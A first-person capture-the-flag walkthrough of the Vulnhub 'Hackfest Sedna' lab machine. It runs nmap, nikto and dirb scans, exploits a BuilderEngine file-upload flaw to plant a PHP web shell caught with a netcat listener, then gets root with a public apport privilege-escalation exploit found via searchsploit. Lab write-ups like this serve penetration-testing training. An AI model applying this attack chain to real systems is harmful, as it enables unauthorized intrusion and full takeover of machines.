Vulnhub

Hackfest Sedna

Reconnaisance/Enumeration

First we need to know what is running on the machine.
We’ll be launching a general scan on the target machine


nmap -vv -Pn -A -sC -sS -T 4 -p- 192.168.1.131

Discovered open port 139/tcp on 192.168.1.131

Discovered open port 445/tcp on 192.168.1.131
Discovered open port 995/tcp on 192.168.1.131
Discovered open port 8080/tcp on 192.168.1.131
Discovered open port 110/tcp on 192.168.1.131
Discovered open port 993/tcp on 192.168.1.131
Discovered open port 143/tcp on 192.168.1.131
Discovered open port 53/tcp on 192.168.1.131
Discovered open port 111/tcp on 192.168.1.131
Discovered open port 80/tcp on 192.168.1.131
Discovered open port 22/tcp on 192.168.1.131
...

We get a lot of port that are opens.
The easiest one to check are the web port (80,8080)

Web port 80

We browse http://192.168.1.131 to see what is going on with that.

The only thing that we get is an jpg telling us to click on it.
That brings us to another image. We can look at the source code and see that
it’s not leading us to something good.

Web port 8080

Another website that we can browse is http://192.168.1.131:8080.
This time we get something more valuable.
We see a congratulation message telling us that Tomcat has been installed.

We also get a local filesystem path : /var/lib/tomcat7/webapps/ROOT/index.html
We also get that Tomcat is installed with CATALINA_HOME
This page lead us to plenty of other pages that let’s us access to Tomcat 7 servlets.

There’s a lot of them and i wasted a good hour looking at them.

Nikto

Now that we have two websites we can run Nikto on both of them hoping we get something good.

nikto -h 192.168.1.131

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.131
+ Target Hostname:    192.168.1.131
+ Target Port:        80
+ Start Time:         2017-04-25 20:50:13 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53fb059bb5bc8 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting...
+ OSVDB-3092: /system/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ 7536 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2017-04-25 20:50:28 (GMT-4) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The first website has files and system folders that we can look at.
Those directories will lead us to many files that look to pertain to a CMS.
Still not enough information to tell us which one it is

nikto -h 192.168.1.131:8080

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.131
+ Target Hostname:    192.168.1.131
+ Target Port:        8080
+ Start Time:         2017-04-25 20:52:03 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ Server leaks inodes via ETags, header found with file /, fields: 0xW/1895 0x1475867860000 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS 
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /: Appears to be a default Apache Tomcat install.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ /manager/html: Default Tomcat Manager / Host Manager interface found
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found
+ /manager/status: Default Tomcat Server Status interface found
+ 7839 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2017-04-25 20:52:34 (GMT-4) (31 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

This results are interesting because of the PUT allowed http method.
I’ll look into it, there’s also the snoop.jsp that seems to display information.
Both are worth a look.
We also have a bunch of folders locked behind a login.

Dirb

After looking at my options and trying a few different way to use the put method i tried something else.
I used dirb on both website hoping to find more stuff that could lead into something good.


dirb http://192.168.1.131 /usr/share/wordlists/dirb/common.txt
...

We’ll get a lot of information with this comment, we can see that there’s a lot of folders like blocks,modules,themes,system

Looking at the files i noticed builder engine v3 pretty often.
I decide to go back to nikto and look at the license.txt and there it was!
We got an CMS caled BuilderEngine by Radian Enterprise Systems limited.

First thing is to type builderEngine exploit and that leads us to https://www.exploit-db.com/exploits/40390/ And easy exploit that allows us to upload a file directly on the server!
I wasted like 2 hours try to find a way to upload a file when this was much easier.
I had to look how other people executed this exploit to find out how easy it was.
We only need to modify the localhost part and name the file .html
From there we can open the file in any browser and upload a file.
It will be uploaded directly in http://192.168.1.131/files We decided to upload a php web shell from pentestmonkey.
We setup a nc listener

nc -lv 1234

And load the page and voila we got a shell.

More flags

Now that we have access to the machine, we need to find a way to privilege
escalade.

We’re currently connected as the user www-data
He’s the one that is running the web server.

First thing that we should do is look at the kernel version and OS.

uname -a

Linux Sedna 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686
i686 i686 GNU/Linux

We got a version 3.13.0 and it’s running Ubuntu.

We’ll now find the OS Version.

cat /etc/lsb-rel*

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION=“Ubuntu 14.04.1 LTS”

Easy enough, we got a kernel and the OS. Next step is look in exploit-db is
there’s a exploit for those version.

Using seachexploit we can search by keyword.

searchexploit 3.13 local

--------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                       |  Path
                                                                                                                     | (/usr/share/exploitdb/platforms)
--------------------------------------------------------------------------------------------------------------------- ----------------------------------
Apple Mac OSX xnu 1228.3.13 - (macfsstat) Local Kernel Memory Leak/Denial of Service                                 | ./osx/dos/8263.c
pam-krb5 < 3.13 - Privilege Escalation                                                                               | ./linux/local/8303.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write Exploit (2)                              | ./linux/local/31346.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Privilege Escalation (3)                         | ./linux/local/31347.c
Linux Kernel 3.13 - Privilege Escalation PoC (gid)                                                                   | ./linux/local/33824.c
Linux Kernel 3.13 / 3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service                                   | ./linux/dos/36743.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation                       | ./linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation (Access /etc/shadow)  | ./linux/local/37293.txt
--------------------------------------------------------------------------------------------------------------------- ----------------------------------

This tool is so freaking useful to quickly find the right exploits. I used 3.13 for the kernel version and local for local privilege escalation

We can see that we got a bunch of eligible exploits that we can try and run on Sedna

I tried runnign 37292 but it wouldn’t want to work. It compile and executed correctly but the id wasn’t changing. It’s a no go.

Then i tried 33824 and that one worked. It allow me to change permission of files but i couldn’t make it work on directories. So that was half a win.

I had to find another way to get root.

More enumeration

After some google search i found that ubuntu OS was vulnerable to another privilege escalation because of a service called apport.

The exploit being 36746.

After more googling i found out what apport was and i looked into Sedna to see if the service was running.

cat /etc/services

I tried looking for the service in there and i couldn’t find it.

service --status-all

Using that command allowed to be see all the services running/not running

apport was in the list.

So i tried looking for the command so i could try running it.

A little bit of googling lead me to the command apport-cli

apport-cli

No pending crash reports. Try —help for more information.

And there is it!! The command is in the system.

We transfer over the file and build the exploit and run it !

./apport

id
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)

And there we have it. We got root!

cd /root
cat flag.txt

Post exploitation

We need to find two flags hidden in the system.

A simple find throught the system looking for flag.txt gave up the first flag.

It was in /var/log/flag.txt

There’s a second one hidden.

It’s most probably linked to the user name crackmeforpoints found in the /etc/passwd file.